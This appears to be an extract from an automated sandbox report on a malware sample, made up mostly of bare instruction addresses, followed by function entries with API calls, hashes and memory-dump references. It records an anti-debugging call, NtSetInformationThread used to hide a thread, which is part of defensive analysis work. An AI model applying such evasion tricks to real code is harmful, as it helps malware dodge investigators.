                                  0x00401e9c
                                  0x00401e9e
                                  0x00401ea0
                                  0x00401ea2
                                  0x00401ea4
                                  0x00401ea6
                                  0x00401ea8
                                  0x00401eaa
                                  0x00401eac
                                  0x00401eae
                                  0x00401eb0
                                  0x00401eb2
                                  0x00401eb4
                                  0x00401eb6
                                  0x00401eb8
                                  0x00401eba
                                  0x00401ebc
                                  0x00401ebe
                                  0x00401ebf
                                  0x00401ec1
                                  0x00401ec3
                                  0x00401ec5
                                  0x00401ec7
                                  0x00401ec9
                                  0x00401ecb
                                  0x00401ece
                                  0x00401ed0
                                  0x00401ed2
                                  0x00401ed4
                                  0x00401ed6
                                  0x00401ed8
                                  0x00401eda
                                  0x00401edc
                                  0x00401edd
                                  0x00401ede
                                  0x00401ee0
                                  0x00401ee1
                                  0x00401ee2
                                  0x00401ee4
                                  0x00401ee5
                                  0x00401ee6
                                  0x00401ee8
                                  0x00401ee9
                                  0x00401eea
                                  0x00401eec
                                  0x00401ef1
                                  0x00401ef2
                                  0x00401ef4
                                  0x00401ef9
                                  0x00401efb
                                  0x00401efe
                                  0x00401f00
                                  0x00401f03
                                  0x00401f06
                                  0x00401f08
                                  0x00401f0d
                                  0x00401f0f
                                  0x00401f11
                                  0x00401f13
                                  0x00401f15
                                  0x00401f17
                                  0x00401f19
                                  0x00401f1b
                                  0x00401f1d
                                  0x00401f1f
                                  0x00401f22
                                  0x00401f24
                                  0x00401f26
                                  0x00401f28
                                  0x00401f2a
                                  0x00401f2c
                                  0x00401f2e
                                  0x00401f30
                                  0x00401f32
                                  0x00401f34
                                  0x00401f36
                                  0x00401f38
                                  0x00401f3f
                                  0x00401f41
                                  0x00401f43
                                  0x00401f45
                                  0x00401f47
                                  0x00401f49
                                  0x00401f4b
                                  0x00401f4d
                                  0x00401f4f
                                  0x00401f51
                                  0x00401f53
                                  0x00401f56
                                  0x00401f56
                                  0x00401f58
                                  0x00401f59
                                  0x00401f5a
                                  0x00401fbd
                                  0x00401fbd
                                  0x00401fc0
                                  0x00401fc3
                                  0x00401fc5
                                  0x00401fc5
                                  0x00401fc6
                                  0x00401fc7
                                  0x00401fc8
                                  0x00401fc8
                                  0x00401fca
                                  0x00401fcc
                                  0x00401fcd
                                  0x00401fce
                                  0x00401fce
                                  0x00401fce
                                  0x00401fd2
                                  0x00401fd2
                                  0x00401fd3
                                  0x00402036
                                  0x00402036
                                  0x00402037
                                  0x00402039
                                  0x0040203b
                                  0x0040203b
                                  0x0040203b
                                  0x0040203e
                                  0x0040203e
                                  0x0040203f
                                  0x0040203f
                                  0x00402041
                                  0x00402041
                                  0x00402043
                                  0x00402043
                                  0x00402043
                                  0x00402046
                                  0x00402046
                                  0x00402047
                                  0x00402049
                                  0x0040204b
                                  0x0040204b
                                  0x0040204b
                                  0x0040204e
                                  0x0040204e
                                  0x0040204f
                                  0x0040204f
                                  0x00402051
                                  0x00402051
                                  0x00402051
                                  0x00402053
                                  0x00402053
                                  0x00402053
                                  0x00402053
                                  0x00402056
                                  0x00402056
                                  0x00402057
                                  0x00402059
                                  0x00402059
                                  0x0040205b
                                  0x0040205b
                                  0x0040205b
                                  0x0040205b
                                  0x0040205e
                                  0x0040205e
                                  0x0040205f
                                  0x00402061
                                  0x00402067
                                  0x0040206d
                                  0x00402070
                                  0x00402072
                                  0x00402074
                                  0x00402077
                                  0x0040207e
                                  0x0040207f
                                  0x00402082
                                  0x00402083
                                  0x00402086
                                  0x00402088
                                  0x00402089
                                  0x0040208e
                                  0x00402090
                                  0x00402092
                                  0x00402094
                                  0x00402096
                                  0x00402098
                                  0x00402099
                                  0x0040209d
                                  0x004020a0
                                  0x004020a5
                                  0x004020a7
                                  0x004020a9
                                  0x004020ac
                                  0x004020ae
                                  0x004020af
                                  0x004020b5
                                  0x004020b5
                                  0x004020b8
                                  0x004020bc
                                  0x004020bf
                                  0x004020c8
                                  0x004020d0
                                  0x004020d4
                                  0x004020d7
                                  0x004020dc
                                  0x004020dd
                                  0x004020dd
                                  0x004020e0
                                  0x004020e3
                                  0x004020f4
                                  0x004020f9
                                  0x004020fc
                                  0x004020ff
                                  0x00402101
                                  0x00402104
                                  0x00402104
                                  0x00402108
                                  0x0040210c
                                  0x0040210f
                                  0x00402123
                                  0x0040212c
                                  0x0040212d
                                  0x00402136
                                  0x00402137
                                  0x00402144
                                  0x00402146
                                  0x00402147
                                  0x00402149
                                  0x0040214b
                                  0x00402151
                                  0x0040215e
                                  0x0040215f
                                  0x00402161
                                  0x00402163
                                  0x00402165
                                  0x00402167
                                  0x00402169
                                  0x0040216b
                                  0x0040216d
                                  0x0040216f
                                  0x00402171
                                  0x00402173
                                  0x00402175
                                  0x00402177
                                  0x00402179
                                  0x0040217b
                                  0x0040217d
                                  0x0040217f
                                  0x00402181
                                  0x00402183
                                  0x00402185
                                  0x00402187
                                  0x00402189
                                  0x0040218b
                                  0x0040218d
                                  0x0040218f
                                  0x00402191
                                  0x00402193
                                  0x00402195
                                  0x00402197
                                  0x00402199
                                  0x0040219b
                                  0x0040219d
                                  0x0040219f
                                  0x004021a1
                                  0x004021a3
                                  0x004021a5
                                  0x004021a7
                                  0x004021a9
                                  0x004021ab
                                  0x004021ad
                                  0x004021af
                                  0x004021b1
                                  0x004021b3
                                  0x004021b5
                                  0x004021b7
                                  0x004021b9
                                  0x004021bc
                                  0x004021bd
                                  0x004021bd
                                  0x004021be
                                  0x004021bf
                                  0x004021c1
                                  0x004021c3
                                  0x004021c5
                                  0x004021c7
                                  0x004021c9
                                  0x004021cb
                                  0x004021cd
                                  0x004021cf
                                  0x004021d1
                                  0x004021d3
                                  0x004021d5
                                  0x004021d7
                                  0x004021d9
                                  0x004021db
                                  0x004021e1
                                  0x004021e5
                                  0x004021e7
                                  0x004021e7
                                  0x0040eac7
                                  0x0040ead6
                                  0x0040eae2
                                  0x0040eaea
                                  0x0040eaed
                                  0x0040eafa
                                  0x0040eb02
                                  0x0040eb0d
                                  0x0040eb10
                                  0x0040eb17
                                  0x0040eb34
                                  0x0040eb19
                                  0x0040eb19
                                  0x0040eb1e
                                  0x0040eb23
                                  0x0040eb28
                                  0x0040eb28
                                  0x0040eb3e
                                  0x0040eb46
                                  0x0040eb5e
                                  0x0040eb61
                                  0x0040eb63
                                  0x0040eb69
                                  0x0040eb70
                                  0x0040eb92
                                  0x0040eb92
                                  0x0040eb92
                                  0x0040eb72
                                  0x0040eb72
                                  0x0040eb74
                                  0x0040eb79
                                  0x0040eb7f
                                  0x0040eb85
                                  0x0040eb8a
                                  0x0040eb8a
                                  0x0040eb9c
                                  0x0040ebb7
                                  0x0040ebba
                                  0x0040ebbc
                                  0x0040ebc2
                                  0x0040ebc9
                                  0x0040ebeb
                                  0x0040ebeb
                                  0x0040ebeb
                                  0x0040ebcb
                                  0x0040ebcb
                                  0x0040ebcd
                                  0x0040ebd2
                                  0x0040ebd8
                                  0x0040ebde
                                  0x0040ebe3
                                  0x0040ebe3
                                  0x0040ebf9
                                  0x0040ec00
                                  0x0040ec0b
                                  0x0040ec17
                                  0x0040ec23
                                  0x0040ec43
                                  0x0040ec6b
                                  0x0040ec77
                                  0x0040ec7a
                                  0x0040ec83
                                  0x0040eca2
                                  0x0040eca8
                                  0x0040ecae
                                  0x0040ecb5
                                  0x0040ecd7
                                  0x0040ecd7
                                  0x0040ecd7
                                  0x0040ecb7
                                  0x0040ecb7
                                  0x0040ecbc
                                  0x0040ecc1
                                  0x0040ecc4
                                  0x0040ecca
                                  0x0040eccf
                                  0x0040eccf
                                  0x0040ecde
                                  0x0040ecef
                                  0x0040ecfc
                                  0x0040ed01
                                  0x0040ed0b
                                  0x0040ed15
                                  0x0040ed24
                                  0x0040ed60
                                  0x0040ed70
                                  0x0040ed75
                                  0x0040ed7e
                                  0x0040ed84
                                  0x0040ed8d
                                  0x0040ed9c
                                  0x0040ede1
                                  0x0040ede7
                                  0x0040eded
                                  0x0040edf4
                                  0x0040ee16
                                  0x0040ee16
                                  0x0040ee16
                                  0x0040edf6
                                  0x0040edf6
                                  0x0040edfb
                                  0x0040ee00
                                  0x0040ee03
                                  0x0040ee09
                                  0x0040ee0e
                                  0x0040ee0e
                                  0x0040ee23
                                  0x0040ee26
                                  0x0040ee35
                                  0x0040ee41
                                  0x0040ee84
                                  0x0040ee8a
                                  0x0040ee90
                                  0x0040ee97
                                  0x0040eeb9
                                  0x0040eeb9
                                  0x0040eeb9
                                  0x0040ee99
                                  0x0040ee99
                                  0x0040ee9e
                                  0x0040eea3
                                  0x0040eea6
                                  0x0040eeac
                                  0x0040eeb1
                                  0x0040eeb1
                                  0x0040eec6
                                  0x0040eecf
                                  0x0040eeda
                                  0x0040eee0
                                  0x0040eeea
                                  0x0040eef4
                                  0x0040ef25
                                  0x0040ef32
                                  0x0040ef36
                                  0x0040ef40
                                  0x0040ef51
                                  0x0040ef5c
                                  0x0040efa8
                                  0x0040efae
                                  0x0040efb4
                                  0x0040efbb
                                  0x0040efdd
                                  0x0040efdd
                                  0x0040efdd
                                  0x0040efbd
                                  0x0040efbd
                                  0x0040efc2
                                  0x0040efc7
                                  0x0040efca
                                  0x0040efd0
                                  0x0040efd5
                                  0x0040efd5
                                  0x0040efea
                                  0x0040eff3
                                  0x0040eff9
                                  0x0040f006
                                  0x0040f00b
                                  0x0040f014
                                  0x0040f026
                                  0x0040f02b
                                  0x0040f075
                                  0x0040f082
                                  0x0040f090
                                  0x0040f095
                                  0x0040f0a0
                                  0x0040f0a6
                                  0x0040f0ac
                                  0x0040f0b3
                                  0x0040f0d5
                                  0x0040f0d5
                                  0x0040f0d5
                                  0x0040f0b5
                                  0x0040f0b5
                                  0x0040f0ba
                                  0x0040f0bf
                                  0x0040f0c2
                                  0x0040f0c8
                                  0x0040f0cd
                                  0x0040f0cd
                                  0x0040f0dc
                                  0x0040f0eb
                                  0x0040f0f1
                                  0x0040f0fa
                                  0x0040f103
                                  0x0040f10c
                                  0x0040f151
                                  0x0040f157
                                  0x0040f15d
                                  0x0040f164
                                  0x0040f186
                                  0x0040f186
                                  0x0040f186
                                  0x0040f166
                                  0x0040f166
                                  0x0040f16b
                                  0x0040f170
                                  0x0040f173
                                  0x0040f179
                                  0x0040f17e
                                  0x0040f17e
                                  0x0040f18d
                                  0x0040f1b1
                                  0x0040f1be
                                  0x0040f1ca
                                  0x0040f1d7
                                  0x0040f1f1
                                  0x0040f1f7
                                  0x0040f1fd
                                  0x0040f204
                                  0x0040f226
                                  0x0040f226
                                  0x0040f226
                                  0x0040f206
                                  0x0040f206
                                  0x0040f20b
                                  0x0040f210
                                  0x0040f213
                                  0x0040f219
                                  0x0040f21e
                                  0x0040f21e
                                  0x0040f237
                                  0x0040f23c
                                  0x0040f247
                                  0x0040f24c
                                  0x0040f256
                                  0x0040f260
                                  0x0040f26f
                                  0x0040f272
                                  0x0040f277
                                  0x0040f2aa
                                  0x0040f2c0
                                  0x0040f2cb
                                  0x0040f2db
                                  0x0040f2e0
                                  0x0040f2e3
                                  0x0040f2f5
                                  0x0040f2ff
                                  0x0040f302
                                  0x0040f307
                                  0x0040f311
                                  0x0040f338
                                  0x0040f35d
                                  0x0040f36d
                                  0x0040f372
                                  0x0040f375
                                  0x0040f37e
                                  0x0040f387
                                  0x0040f390
                                  0x0040f39a
                                  0x0040f3b7
                                  0x0040f3c9
                                  0x0040f3f3
                                  0x0040f400
                                  0x0040f40a
                                  0x0040f416
                                  0x0040f41c
                                  0x0040f454
                                  0x0040f45a
                                  0x0040f460
                                  0x0040f467
                                  0x0040f489
                                  0x0040f489
                                  0x0040f489
                                  0x0040f469
                                  0x0040f469
                                  0x0040f46e
                                  0x0040f473
                                  0x0040f476
                                  0x0040f47c
                                  0x0040f481
                                  0x0040f481
                                  0x0040f496
                                  0x0040f49f
                                  0x0040f4a8
                                  0x0040f4ae
                                  0x0040f4b7
                                  0x0040f4c1
                                  0x0040f4cb
                                  0x0040f4d5
                                  0x0040f4df
                                  0x0040f528
                                  0x0040f53a
                                  0x0040f547
                                  0x0040f551
                                  0x0040f572
                                  0x0040f578
                                  0x0040f57e
                                  0x0040f585
                                  0x0040f5a7
                                  0x0040f5a7
                                  0x0040f5a7
                                  0x0040f587
                                  0x0040f587
                                  0x0040f58c
                                  0x0040f591
                                  0x0040f594
                                  0x0040f59a
                                  0x0040f59f
                                  0x0040f59f
                                  0x0040f5b4
                                  0x0040f5b7
                                  0x0040f5c1
                                  0x0040f5ca
                                  0x0040f5d3
                                  0x0040f5dd
                                  0x0040f625
                                  0x0040f635
                                  0x0040f63b
                                  0x0040f641
                                  0x0040f648
                                  0x0040f66a
                                  0x0040f66a
                                  0x0040f66a
                                  0x0040f64a
                                  0x0040f64a
                                  0x0040f64f
                                  0x0040f654
                                  0x0040f657
                                  0x0040f65d
                                  0x0040f662
                                  0x0040f662
                                  0x0040f677
                                  0x0040f692
                                  0x0040f6a7
                                  0x0040f6ad
                                  0x0040f6b3
                                  0x0040f6ba
                                  0x0040f6dc
                                  0x0040f6dc
                                  0x0040f6dc
                                  0x0040f6bc
                                  0x0040f6bc
                                  0x0040f6c1
                                  0x0040f6c6
                                  0x0040f6c9
                                  0x0040f6cf
                                  0x0040f6d4
                                  0x0040f6d4
                                  0x0040f6e9
                                  0x0040f6f2
                                  0x0040f6f8
                                  0x0040f717
                                  0x0040f71a
                                  0x0040f729
                                  0x0040f73e
                                  0x0040f74a
                                  0x0040f74d
                                  0x0040f757
                                  0x0040f760
                                  0x0040f76a
                                  0x0040f77a
                                  0x0040f7ac
                                  0x0040f7af
                                  0x0040f7be
                                  0x0040f7ca
                                  0x0040f7d0
                                  0x0040f7f5
                                  0x0040f7fb
                                  0x0040f801
                                  0x0040f808
                                  0x0040f82a
                                  0x0040f82a
                                  0x0040f82a
                                  0x0040f80a
                                  0x0040f80a
                                  0x0040f80f
                                  0x0040f814
                                  0x0040f817
                                  0x0040f81d
                                  0x0040f822
                                  0x0040f822
                                  0x0040f840
                                  0x0040f846
                                  0x0040f84c
                                  0x0040f853
                                  0x0040f875
                                  0x0040f875
                                  0x0040f875
                                  0x0040f855
                                  0x0040f855
                                  0x0040f85a
                                  0x0040f85f
                                  0x0040f862
                                  0x0040f868
                                  0x0040f86d
                                  0x0040f86d
                                  0x0040f883
                                  0x0040f88f
                                  0x0040f895
                                  0x0040f8a3
                                  0x0040f8a6
                                  0x0040f8ab
                                  0x0040f8c3
                                  0x0040f8d2
                                  0x0040f8e4
                                  0x0040f8ed
                                  0x0040f8f2
                                  0x0040f919
                                  0x0040f925
                                  0x0040f930
                                  0x0040f933
                                  0x0040f93e
                                  0x0040f94a
                                  0x0040f950
                                  0x0040f95a
                                  0x0040f964
                                  0x0040f982
                                  0x0040f991
                                  0x0040f9c2
                                  0x0040f9c8
                                  0x0040f9ce
                                  0x0040f9d5
                                  0x0040f9f7
                                  0x0040f9f7
                                  0x0040f9f7
                                  0x0040f9d7
                                  0x0040f9d7
                                  0x0040f9dc
                                  0x0040f9e1
                                  0x0040f9e4
                                  0x0040f9ea
                                  0x0040f9ef
                                  0x0040f9ef
                                  0x0040fa04
                                  0x0040fa07
                                  0x0040fa0a
                                  0x0040fa17
                                  0x0040fa25
                                  0x0040fa2b
                                  0x0040fa31
                                  0x0040fa38
                                  0x0040fa5a
                                  0x0040fa5a
                                  0x0040fa5a
                                  0x0040fa3a
                                  0x0040fa3a
                                  0x0040fa3f
                                  0x0040fa44
                                  0x0040fa47
                                  0x0040fa4d
                                  0x0040fa52
                                  0x0040fa52
                                  0x0040fa6d
                                  0x0040fa78
                                  0x0040fa84
                                  0x0040fa8a
                                  0x0040fab3
                                  0x0040fab9
                                  0x0040fabf
                                  0x0040fac6
                                  0x0040fae8
                                  0x0040fae8
                                  0x0040fae8
                                  0x0040fac8
                                  0x0040fac8
                                  0x0040facd
                                  0x0040fad2
                                  0x0040fad5
                                  0x0040fadb
                                  0x0040fae0
                                  0x0040fae0
                                  0x0040faef
                                  0x0040fb00
                                  0x0040fb36
                                  0x0040fb3c
                                  0x0040fb42
                                  0x0040fb49
                                  0x0040fb6b
                                  0x0040fb6b
                                  0x0040fb6b
                                  0x0040fb4b
                                  0x0040fb4b
                                  0x0040fb50
                                  0x0040fb55
                                  0x0040fb58
                                  0x0040fb5e
                                  0x0040fb63
                                  0x0040fb63
                                  0x0040fb75
                                  0x0040fb80
                                  0x0040fba1
                                  0x0040fbad
                                  0x0040fbb0
                                  0x0040fbbf
                                  0x0040fbe7
                                  0x0040fbf9
                                  0x0040fbff
                                  0x0040fc05
                                  0x0040fc0c
                                  0x0040fc2e
                                  0x0040fc2e
                                  0x0040fc2e
                                  0x0040fc0e
                                  0x0040fc0e
                                  0x0040fc13
                                  0x0040fc18
                                  0x0040fc1b
                                  0x0040fc21
                                  0x0040fc26
                                  0x0040fc26
                                  0x0040fc3a
                                  0x0040fc3d
                                  0x0040fc42
                                  0x0040fc4b
                                  0x0040fc5b
                                  0x0040fc72
                                  0x0040fc84
                                  0x0040fc9d
                                  0x0040fca3
                                  0x0040fca9
                                  0x0040fcb0
                                  0x0040fcd2
                                  0x0040fcd2
                                  0x0040fcd2
                                  0x0040fcb2
                                  0x0040fcb2
                                  0x0040fcb7
                                  0x0040fcbc
                                  0x0040fcbf
                                  0x0040fcc5
                                  0x0040fcca
                                  0x0040fcca
                                  0x0040fcdc
                                  0x0040fceb
                                  0x0040fcf1
                                  0x0040fcf3
                                  0x0040fcf9
                                  0x0040fd00
                                  0x0040fd22
                                  0x0040fd22
                                  0x0040fd22
                                  0x0040fd02
                                  0x0040fd02
                                  0x0040fd07
                                  0x0040fd0c
                                  0x0040fd0f
                                  0x0040fd15
                                  0x0040fd1a
                                  0x0040fd1a
                                  0x0040fd38
                                  0x0040fd3e
                                  0x0040fd45
                                  0x0040fd46
                                  0x00000000
                                  0x0040fd46
                                  0x00401fd5
                                  0x00401fd6
                                  0x00000000
                                  0x00000000
                                  0x00401fd9
                                  0x00401fda
                                  0x00000000
                                  0x00000000
                                  0x00401fdc
                                  0x0040202a
                                  0x0040202a
                                  0x0040202c
                                  0x0040202e
                                  0x00402030
                                  0x00402032
                                  0x00402032
                                  0x00402034
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402034
                                  0x00401fde
                                  0x00401fe3
                                  0x00401fe3
                                  0x00000000
                                  0x00000000
                                  0x00401fe5
                                  0x00401fe6
                                  0x00000000
                                  0x00000000
                                  0x00401fe9
                                  0x00401fea
                                  0x00000000
                                  0x00000000
                                  0x00401fec
                                  0x00401fec
                                  0x00401fef
                                  0x00401ff0
                                  0x00000000
                                  0x00401ff2
                                  0x00401ff2
                                  0x00401ff3
                                  0x00000000
                                  0x00000000
                                  0x00401ff6
                                  0x00401ff7
                                  0x00000000
                                  0x00000000
                                  0x00401ff9
                                  0x00401ffb
                                  0x00401ffc
                                  0x00401ffe
                                  0x00402001
                                  0x00402005
                                  0x00402008
                                  0x0040200a
                                  0x0040200d
                                  0x0040200f
                                  0x00402011
                                  0x00402013
                                  0x00402015
                                  0x00402017
                                  0x00402019
                                  0x0040201b
                                  0x0040201d
                                  0x00402020
                                  0x00402022
                                  0x00402024
                                  0x00402025
                                  0x00402025
                                  0x00402026
                                  0x00000000
                                  0x00402026
                                  0x00401ff0
                                  0x00401f5c
                                  0x00401f5d
                                  0x00401f5e
                                  0x00000000
                                  0x00000000
                                  0x00401f60
                                  0x00401f64
                                  0x00401f65
                                  0x00000000
                                  0x00000000
                                  0x00401f67
                                  0x00401f68
                                  0x00401f6a
                                  0x00401f6d
                                  0x00401f71
                                  0x00401f72
                                  0x00401f73
                                  0x00401f74
                                  0x00000000
                                  0x00000000
                                  0x00401f76
                                  0x00401f77
                                  0x00000000
                                  0x00000000
                                  0x00401f79
                                  0x00401f7c
                                  0x00401f7d
                                  0x00401f7f
                                  0x00401f82
                                  0x00401f84
                                  0x00401f85
                                  0x00401f87
                                  0x00401f89
                                  0x00401f8f
                                  0x00401f91
                                  0x00401f93
                                  0x00401f99
                                  0x00401f9d
                                  0x00401fa3
                                  0x00401fa5
                                  0x00401fa8
                                  0x00401fad
                                  0x00401faf
                                  0x00401fb1
                                  0x00401fb4
                                  0x00401fb6
                                  0x00401fb7
                                  0x00401fb7
                                  0x00000000
                                  0x00401fb7
                                  0x004018e0
                                  0x004018e6
                                  0x004018e9
                                  0x004018e9
                                  0x004018ea
                                  0x004018eb
                                  0x004018f0
                                  0x004018f2
                                  0x004018f4
                                  0x004018f6
                                  0x004018f8
                                  0x004018fa
                                  0x004018fc
                                  0x004018fe
                                  0x00401900
                                  0x00401902
                                  0x00401904
                                  0x00401906
                                  0x00401908
                                  0x0040190a
                                  0x0040190c
                                  0x0040190e
                                  0x00401910
                                  0x00401912
                                  0x00401914
                                  0x00401916
                                  0x00401918
                                  0x0040191d
                                  0x0040191f
                                  0x00401921
                                  0x00401924
                                  0x00401925
                                  0x00401927
                                  0x00401929
                                  0x00401929
                                  0x00000000
                                  0x00401929
                                  0x00401870
                                  0x00401871
                                  0x00401871
                                  0x00401871
                                  0x00401874
                                  0x00000000
                                  0x00000000
                                  0x00401876
                                  0x00401878
                                  0x00401879
                                  0x0040187a
                                  0x0040187a
                                  0x0040187f
                                  0x00401880
                                  0x00401881
                                  0x00401882
                                  0x00000000
                                  0x00000000
                                  0x00401884
                                  0x00401885
                                  0x00401887
                                  0x0040188a
                                  0x0040188e
                                  0x0040188f
                                  0x00401891
                                  0x00401892
                                  0x00401894
                                  0x00401899
                                  0x0040189b
                                  0x0040189c
                                  0x0040189e
                                  0x004018a0
                                  0x004018a2
                                  0x004018a4
                                  0x004018a6
                                  0x004018a8
                                  0x004018aa
                                  0x004018ac
                                  0x004018ae
                                  0x004018b0
                                  0x004018b2
                                  0x004018b4
                                  0x004018b6
                                  0x004018b8
                                  0x004018ba
                                  0x004018bc
                                  0x004018bc
                                  0x004018bc
                                  0x004018be
                                  0x004018c0
                                  0x004018c2
                                  0x004018c4
                                  0x004018c6
                                  0x004018c6
                                  0x00000000
                                  0x004018c6
                                  0x00401866
                                  0x00401710
                                  0x00401711
                                  0x00401712
                                  0x00401712
                                  0x00401718
                                  0x00000000
                                  0x00000000
                                  0x0040171a
                                  0x00000000
                                  0x00000000
                                  0x0040171c
                                  0x0040171d
                                  0x0040171e
                                  0x00000000
                                  0x00000000
                                  0x00401720
                                  0x00401721
                                  0x0040175a
                                  0x0040175b
                                  0x00401761
                                  0x00401763
                                  0x00401765
                                  0x00401767
                                  0x00401769
                                  0x0040176b
                                  0x0040176d
                                  0x0040176f
                                  0x00401771
                                  0x00401773
                                  0x00401775
                                  0x00401777
                                  0x00401777
                                  0x00000000
                                  0x00401777
                                  0x00401723
                                  0x00401725
                                  0x00401729
                                  0x0040172a
                                  0x0040172c
                                  0x0040172f
                                  0x00401730
                                  0x00401732
                                  0x00401733
                                  0x0040173d
                                  0x0040173f
                                  0x00401745
                                  0x00401749

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: #100
                                  • String ID: VB5!6&*
                                  • API String ID: 1341478452-3593831657
                                  • Opcode ID: b653f5966a3c3624e96fa98d5f26d41dc372d35dab61f105f3c2aa2668d59ce8
                                  • Instruction ID: 6451aac32362c4265d394ddd802377ffd0490cf763fe1c3fe4a02c22f151390b
                                  • Opcode Fuzzy Hash: b653f5966a3c3624e96fa98d5f26d41dc372d35dab61f105f3c2aa2668d59ce8
                                  • Instruction Fuzzy Hash: 09D0A40988E3D00FD30322BA1929006AFB80813664B1E04EB90C0EA0F3C05D08498327
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D0B86, Relevance: 1.8, APIs: 1, Instructions: 349nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022D6EA1: LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InformationLibraryLoadThread
                                  • String ID:
                                  • API String ID: 543350213-0
                                  • Opcode ID: 9d6465f998ce33cf0edadc68cece3876822f9822a7e8ce0f2fd6cf73fbaa0e57
                                  • Instruction ID: f7c2aed10662678464138a94d55259855d0678766df8a8943028aa53b5d53f5f
                                  • Opcode Fuzzy Hash: 9d6465f998ce33cf0edadc68cece3876822f9822a7e8ce0f2fd6cf73fbaa0e57
                                  • Instruction Fuzzy Hash: 7CA1BE34674303AAEF3029E888547FE23575F423A4FA4412ADCCAAB59DDBA5C1C7C917
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D0AD3, Relevance: 1.8, APIs: 1, Instructions: 322COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 7216e8640b6d5c461362d22f05bd651ff344214bdab0485fc48aa0c5bb4f951b
                                  • Instruction ID: 5bb9194501209481ea761d6d9579a59c8d6083850739edf794ba27648ae365cf
                                  • Opcode Fuzzy Hash: 7216e8640b6d5c461362d22f05bd651ff344214bdab0485fc48aa0c5bb4f951b
                                  • Instruction Fuzzy Hash: A391DD34674303AAEF3029E88C547FE22575F427A4FA4412ADCCA975ADDBB5C1C6C913
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D0C47, Relevance: 1.8, APIs: 1, Instructions: 266COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd81dd94084824174b1abe3e9c6e24e9f6900eb6e60fed42951adfa4de45382b
                                  • Instruction ID: e97f63c3ac3edafe432e84b048cf08ec81cf81fa84e880d1e2a14258900e6949
                                  • Opcode Fuzzy Hash: cd81dd94084824174b1abe3e9c6e24e9f6900eb6e60fed42951adfa4de45382b
                                  • Instruction Fuzzy Hash: 6171AB34938343AAEF3426E889647FD12535F433A4FA4412ADCCAAB5DDDBA5C186C907
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D0C97, Relevance: 1.8, APIs: 1, Instructions: 256COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fe84bf267a8a24f52f20f6eef8854b05db4c9a6bb590edfe703f76ce72d98d26
                                  • Instruction ID: 59ca4f84e32b82668e9b38dd64b65050f7b0d2d1d8c94c2dd9f7615d453d7c18
                                  • Opcode Fuzzy Hash: fe84bf267a8a24f52f20f6eef8854b05db4c9a6bb590edfe703f76ce72d98d26
                                  • Instruction Fuzzy Hash: 1771AB38934343AAEF3029E889647F912535F423A4FA4412ADCCAA75DDDBB5C587C907
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D0CD7, Relevance: 1.7, APIs: 1, Instructions: 247nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022D6EA1: LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: InformationLibraryLoadThread
                                  • String ID:
                                  • API String ID: 543350213-0
                                  • Opcode ID: 2a04d8a3c3bfec723c481cb19aebfff3091e75cd7f81d174168dafe3b0d32c7e
                                  • Instruction ID: 02480750a851d690e5d932e284c6e6670a0da5b8f6eebcd6d0f63e00c6488651
                                  • Opcode Fuzzy Hash: 2a04d8a3c3bfec723c481cb19aebfff3091e75cd7f81d174168dafe3b0d32c7e
                                  • Instruction Fuzzy Hash: DA619838A34347AAEF3029E888647F913535F423A4FA4411ADCCAA75DDDBB6C586C907
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D0DAF, Relevance: 1.7, APIs: 1, Instructions: 220nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022D6EA1: LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                  Memory Dump Source
